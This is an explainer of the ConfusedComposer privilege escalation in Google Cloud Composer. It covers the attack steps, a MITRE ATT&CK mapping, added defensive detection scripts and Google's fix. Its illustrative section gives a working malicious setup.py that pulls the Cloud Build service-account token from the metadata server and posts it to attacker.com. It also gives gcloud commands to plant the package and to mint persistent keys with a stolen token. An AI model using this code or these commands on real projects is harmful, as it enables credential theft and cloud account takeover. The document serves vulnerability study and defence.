ConfusedComposer: Demystifying Vulnerability

Mayank Sharma

ConfusedComposer was a privilege escalation vulnerability discovered by Tenable Research within the Google Cloud Platform (GCP), which has since been fixed[1][2]. It allowed an attacker with permission to update a Cloud Composer environment (composer.environments.update) to escalate their privileges to the level of the default Cloud Build service account[1][2]. This default service account typically possesses broad permissions across various GCP services, including Cloud Build itself, Cloud Storage, and Artifact Registry, potentially enabling significant unauthorized actions within a GCP project[1][2].

Involved GCP Services

  • Cloud Composer: A managed workflow orchestration service based on Apache Airflow, used for automating data pipelines[1][2].

  • Cloud Build: A managed CI/CD service for building, testing, and deploying applications and containers[1][2]. Cloud Composer utilizes Cloud Build behind the scenes for tasks like installing Python packages[1][2].

Vulnerability Details and Attack Steps

The vulnerability exploited the interaction between Cloud Composer and Cloud Build during the installation of custom Python Package Index (PyPI) packages[2].

  1. Prerequisite: The attacker obtains credentials or assumes an identity with the composer.environments.update permission for a specific Cloud Composer environment[2].

  2. Malicious Package Creation: The attacker creates a custom PyPI package containing malicious code within its installation script (e.g., setup.py)[2]. This code is designed to execute during the package installation process. Python's pip tool, used by Cloud Build, automatically runs setup scripts like setup.py during installation[2][8].

  3. Environment Update: The attacker modifies the target Cloud Composer environment's configuration to include their malicious PyPI package as a dependency[2].

  4. Build Trigger: Cloud Composer initiates a Cloud Build process in the user's project to update the environment, which includes installing the specified PyPI packages[2]. Crucially, before the fix, this build process ran under the identity of the default Cloud Build service account, not the user initiating the update or the Composer environment's own service account[2].

  5. Code Execution: When Cloud Build uses pip to install the malicious package, the code within the package's installation script (setup.py) is executed[2]. This execution occurs within the Cloud Build instance and inherits the permissions of the default Cloud Build service account[2].

  6. Token Theft: The malicious script accesses the Cloud Build instance's metadata API endpoint to retrieve the access token associated with the default Cloud Build service account[2].

  7. Token Exfiltration: The script sends the stolen access token to an attacker-controlled server[2].

  8. Privilege Escalation: The attacker now possesses a token for the highly privileged default Cloud Build service account. They can use this token to authenticate as that service account and perform actions within the GCP project according to its permissions, potentially leading to full project compromise[2].
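
A static check a defender can run on a source distribution before it reaches a Composer environment, covering the install-time execution in steps 2 and 5 and the metadata lookup in step 6. This is an added example, not code from the original article or from Tenable; the function name, marker lists and both sample files are assumptions constructed for illustration.

```python
import ast

# Hosts that serve GCP instance metadata, including service-account tokens.
METADATA_MARKERS = ("metadata.google.internal", "169.254.169.254")
# Modules that give an install script process or network access (assumed list).
RISKY_MODULES = {"subprocess", "socket", "requests", "urllib", "http"}
# Commands pip may invoke while building or installing an sdist (assumed list).
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext"}


def audit_setup_py(source):
    """Return sorted findings for one setup.py, parsed but never executed."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [(node.module or "").split(".")[0]]
        else:
            mods = []
        findings.update(f"import:{m}" for m in mods if m in RISKY_MODULES)
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value for marker in METADATA_MARKERS):
                findings.add("metadata-endpoint")
        if isinstance(node, ast.Call):
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", "")
            if name != "setup":
                continue
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS:
                            findings.add(f"cmdclass:{key.value}")
    return sorted(findings)


# Constructed samples: the first has the shape of the setup.py described above.
SUSPICIOUS_SETUP = '''
import subprocess, requests
from setuptools import setup
from setuptools.command.install import install
URL = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
class CustomInstall(install):
    def run(self):
        install.run(self)
setup(name="example", version="1.0.0", cmdclass={"install": CustomInstall})
'''
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="ok", version="1.0.0")\n'
```

An empty result is not proof of safety, since strings can be assembled at run time and build hooks can also live outside setup.py.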

MITRE ATT&CK Mapping

The ConfusedComposer attack aligns with several MITRE ATT&CK tactics, particularly within the Cloud matrix[3][4][10]:

  • Execution (TA0002): The core of the attack involves executing malicious code (within setup.py) by manipulating the legitimate Cloud Build process triggered by Composer[2]. This leverages a trusted system component for execution.

  • Privilege Escalation (TA0004): The primary goal and outcome. The attacker abuses the composer.environments.update permission and the Composer-Build interaction to gain the higher privileges of the default Cloud Build service account[2][3][4]. This involves exploiting service permissions and interactions[11]. Relevant GCP API calls associated with privilege escalation can include composer.environments.create (related service) and various IAM manipulations post-compromise[4].

  • Credential Access (TA0006): The malicious script actively steals credentials by querying the instance metadata API for the service account token[2][3][4]. This maps to T1552 (Unsecured Credentials), specifically T1552.005 (Cloud Instance Metadata API)[3].

Post-exploitation, an attacker using the stolen token might engage in:

  • Discovery (TA0007): Using the token to list resources and permissions (e.g., gcloud iam service-accounts list)[4][10].

  • Persistence (TA0003): Creating new keys for the compromised service account (gcloud iam service-accounts keys create) or modifying IAM policies (setIamPolicy)[4][6][10].

  • Lateral Movement (TA0008): Using the service account's permissions, potentially including iam.serviceAccounts.actAs, to access or control other resources[4][10].
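
Detection logic for the sequence above, as an added example that is not part of the original article: it pairs a Composer update that changes PyPI packages with sensitive IAM calls made shortly afterwards by the default Cloud Build service account. The audit-log field names, method-name suffixes, the @cloudbuild.gserviceaccount.com address form, the one-hour window and the sample entries are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumed Cloud Audit Logs field names, method names and address form.
PYPI_MASK = "config.softwareConfig.pypiPackages"
SENSITIVE = ("CreateServiceAccountKey", "SetIamPolicy")
BUILD_SA = "@cloudbuild.gserviceaccount.com"
UPDATE = "google.cloud.orchestration.airflow.service.v1.Environments.UpdateEnvironment"

def _ts(e):
    return datetime.fromisoformat(e["timestamp"].replace("Z", "+00:00"))

def _who(e):
    return e["protoPayload"].get("authenticationInfo", {}).get("principalEmail", "")

def is_pypi_update(e):
    p = e["protoPayload"]
    return (p.get("methodName", "").endswith("Environments.UpdateEnvironment")
            and PYPI_MASK in p.get("request", {}).get("updateMask", ""))

def is_build_sa_sensitive(e):
    return _who(e).endswith(BUILD_SA) and e["protoPayload"].get("methodName", "").endswith(SENSITIVE)

def correlate(entries, window=timedelta(hours=1)):
    """Pair each PyPI-package update with sensitive calls made by the default
    Cloud Build service account within `window` after it (one project assumed)."""
    entries = sorted(entries, key=_ts)
    alerts = []
    for i, upd in enumerate(entries):
        if not is_pypi_update(upd):
            continue
        for later in entries[i + 1:]:
            if _ts(later) - _ts(upd) > window:
                break
            if is_build_sa_sensitive(later):
                alerts.append((_who(upd), later["protoPayload"]["methodName"]))
    return alerts

def _entry(ts, who, method, mask=None):  # builds one constructed sample entry
    req = {"updateMask": mask} if mask else {}
    return {"timestamp": ts, "protoPayload": {"methodName": method, "request": req,
            "authenticationInfo": {"principalEmail": who}}}

SAMPLE_LOGS = [  # constructed, not real log data
    _entry("2025-01-10T09:00:00Z", "ops@example.com", UPDATE, "config.nodeCount"),
    _entry("2025-01-10T10:00:00Z", "dev@example.com", UPDATE, PYPI_MASK),
    _entry("2025-01-10T10:07:30Z", "123456789012" + BUILD_SA, "google.iam.admin.v1.CreateServiceAccountKey"),
    _entry("2025-01-10T12:30:00Z", "123456789012" + BUILD_SA, "SetIamPolicy"),
]
```

Where the build runs as the Composer environment's service account instead, as this article describes for fixed environments, the same correlation applies with that account's address in place of BUILD_SA.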

Potential Code Snippets and Commands (Illustrative)

While the original article doesn't provide exact code, the following illustrate the types of commands and script logic that could have been used:

  • Malicious setup.py Snippet (Conceptual):

      # Simplified example within a malicious package's setup.py
      import subprocess
      import requests
      import json
      from setuptools import setup
      from setuptools.command.install import install
    
      EXFIL_URL = "http://attacker.com/log" # Attacker's server
    
      class ExploitInstall(install):
          def run(self):
              try:
                  # Get token from metadata server
                  cmd = 'curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" --silent'
                  token_json = subprocess.check_output(cmd, shell=True).decode()
                  token = json.loads(token_json).get("access_token")
    
                  if token:
                      # Send token to attacker
                      requests.post(EXFIL_URL, json={'token': token})
              except Exception as e:
                  requests.post(EXFIL_URL, json={'error': str(e)}) # Exfiltrate errors too
    
              # Continue standard installation
              install.run(self)
    
      setup(
          name='malicious-composer-package',
          version='1.0.0',
          # ... other standard setup args ...
          cmdclass={'install': ExploitInstall},
      )
    

    This script uses curl via a subprocess to fetch the token from the standard GCP metadata endpoint[7] and then POSTs it to an external server.

  • GCP Command to Update Environment (Attacker):

      # Attacker with composer.environments.update permission adds the package
      # Exact flag might vary; could involve patching or specific package list update flags
      # Assuming malicious package is added to requirements.txt
      gcloud composer environments update YOUR_ENV_NAME \
        --location YOUR_REGION \
        --update-pypi-packages-from-file requirements.txt \
        --project YOUR_PROJECT_ID
    

    Or potentially using patch commands if direct package addition isn't feasible via a simple flag.

  • Metadata API Access Command (Used within script):

      curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
    

    This is the standard command to retrieve the attached service account's token from within a GCP compute instance[3][7].

  • Post-Exploitation Command Example (Using stolen token):

      # Attacker sets the stolen token as an environment variable
      export CLOUD_SDK_AUTH_ACCESS_TOKEN="PASTED_STOLEN_TOKEN"
    
      # Attacker uses gcloud, which now authenticates using the token,
      # potentially to create a persistent key for the compromised service account
      # (--iam-account: the address shown, or the default Cloud Build SA ID)
      gcloud iam service-accounts keys create compromised-key.json \
        --iam-account="PROJECT_NUMBER-compute@developer.gserviceaccount.com" \
        --project YOUR_PROJECT_ID
    

Vulnerability Fix

Google addressed this vulnerability by changing the behavior of Cloud Composer. Instead of using the potentially over-privileged default Cloud Build service account for PyPI installations during updates, Composer now uses the Composer environment's service account[2]. This aligns the permissions used for the operation with the specific environment being updated, adhering to the principle of least privilege. The fix was rolled out for new Composer instances, with existing instances scheduled to be updated by April 2025[2]. GCP also updated relevant documentation regarding permissions and access control for Composer[2].

Sources

[1] ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer
[2] ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer
[3] What is the MITRE ATT&CK Framework for Cloud? 10 TTPs ... - Sysdig https://sysdig.com/blog/what-is-mitre-attck-for-cloud-iaas/
[4] [PDF] MITRE ATT&CK in Google Cloud Platform (GCP): | Expel https://expel.com/wp-content/uploads/2022/08/Expel-GCP-mind-map-kit-080422.pdf
[5] rung/threat-matrix-cicd: Threat matrix for CI/CD Pipeline - GitHub https://github.com/rung/threat-matrix-cicd
[6] Tutorial on privilege escalation and post exploitation tactics ... - GitLab https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/
[7] DinoChiesa/get-gcp-access-token - GitHub https://github.com/DinoChiesa/get-gcp-access-token
[8] Six Malicious Python Packages in the PyPI Targeting Windows Users https://unit42.paloaltonetworks.com/malicious-packages-in-pypi/
[9] Granting Access to Cloud Build - Impersonating a Service Account https://dev.to/tsoden/granting-access-to-cloud-build-impersonating-a-service-account-5hm
[10] Understanding MITRE ATT&CK® Cloud Matrix for Security - Balbix https://www.balbix.com/insights/mitre-attck-for-cloud/
[11] Privilege Escalation in Google Cloud Platform - Part 1 (IAM) https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
[12] Privilege Escalation, Tactic TA0004 - Enterprise - MITRE ATT&CK® https://attack.mitre.org/tactics/TA0004/
[13] Valid Accounts: Cloud Accounts, Sub-technique T1078.004 https://attack.mitre.org/techniques/T1078/004/
[14] [PDF] Defending Continuous Integration/Continuous Delivery (CI/CD ... https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF
[15] Using the MITRE ATT&CK Framework to Strengthen Cloud Security https://orca.security/resources/blog/leveraging-mitre-attack-framework-with-orca/
[16] Mitre ATT&CK Framework: Guide to Mapping Adversary Techniques ... https://www.micromindercs.com/blog/mitre-attack-framework-guide
[17] A defender's MITRE ATT&CK cheat sheet for Google Cloud Platform ... https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/
[18] Software Deployment Tools, Technique T1072 - MITRE ATT&CK® https://attack.mitre.org/techniques/T1072/
[19] Valid Accounts, Technique T1078 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/techniques/T1078/
[20] Matrix - Enterprise - Cloud - MITRE ATT&CK® https://attack.mitre.org/matrices/enterprise/cloud/
[21] Exploitation for Privilege Escalation, Technique T1068 - Enterprise https://attack.mitre.org/techniques/T1068/
[22] Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/tactics/TA0002/
[23] Compromise Accounts: Cloud Accounts, Sub-technique T1586.003 https://attack.mitre.org/techniques/T1586/003/
[24] Escalating Privileges in Google Cloud Composer by ... - NetSPI https://www.netspi.com/blog/technical-blog/cloud-pentesting/privilege-escalation-google-cloud-composer/
[25] Access control with IAM | Cloud Composer https://cloud.google.com/composer/docs/composer-2/access-control
[26] Privilege Escalation in Google Cloud Platform - Hacking The Cloud https://hackingthe.cloud/gcp/exploitation/gcp_iam_privilege_escalation/
[27] A small collection of vulnerable code snippets - GitHub https://github.com/snoopysecurity/Vulnerable-Code-Snippets
[28] Authenticate workloads to Google Cloud APIs using service accounts https://cloud.google.com/compute/docs/access/authenticate-workloads
[29] Malicious Python Packages and Code Execution via pip download https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/
[30] New Privilege Escalation Techniques are Compromising ... - XM Cyber https://xmcyber.com/blog/new-privilege-escalation-techniques-are-compromising-your-google-cloud-platform/
[31] Tenable Uncovers Privilege Escalation Vulnerability in Google Cloud https://www.itvoice.in/tenable-uncovers-privilege-escalation-vulnerability-in-google-cloud
[32] Use Google Cloud Platform https://docs.data-community.publishing.service.gov.uk/tools/google-cloud-platform/gcp-access/
[33] Part 4. Implement token exchange between Azure and GCP in Python https://dev.to/stack-labs/multi-cloud-identity-federation-explained-part-4-implement-token-exchange-between-azure-and-gcp-in-python-1gop
[34] Top 8 malicious attacks recently found on PyPI - Sonatype https://www.sonatype.com/blog/top-8-malicious-attacks-recently-found-on-pypi
[35] Google Cloud Platform (GCP) Service Account-based Privilege ... https://www.praetorian.com/blog/google-cloud-platform-gcp-service-account-based-privilege-escalation-paths/
[36] MITRE ATT&CK Cloud Matrix: Use Cases, Tactics, and Sub-Matrices https://www.exabeam.com/explainers/mitre-attck/mitre-attck-cloud-matrix-use-cases-tactics-and-sub-matrices/
[37] MITRE ATT&CK Cloud Matrix v.16: New Techniques & Why You ... https://www.mitigant.io/en/blog/mitre-att-ck-cloud-matrix-v-16-new-techniques-why-you-should-care-part-i
[38] Cloud Permissions & MITRE ATT&CK | CSA https://cloudsecurityalliance.org/articles/powerful-cloud-permissions-you-should-know-part-2
[39] Detecting MITRE ATT&CK: Privilege escalation with Falco | Sysdig https://sysdig.com/blog/mitre-privilege-escalation-falco/
[40] 10 Malicious Code Examples You Need to Recognize to Defend ... https://www.jit.io/resources/app-security/10-malicious-code-examples-you-need-to-recognize-to-defend-your-sdlc
[41] Is it possible to use gcloud with an access token? - Reddit https://www.reddit.com/r/googlecloud/comments/ntebvd/is_it_possible_to_use_gcloud_with_an_access_token/
[42] GCP Cloud Composer Bug Let Attackers Elevate Access via ... https://thehackernews.com/2025/04/gcp-cloud-composer-bug-let-attackers.html
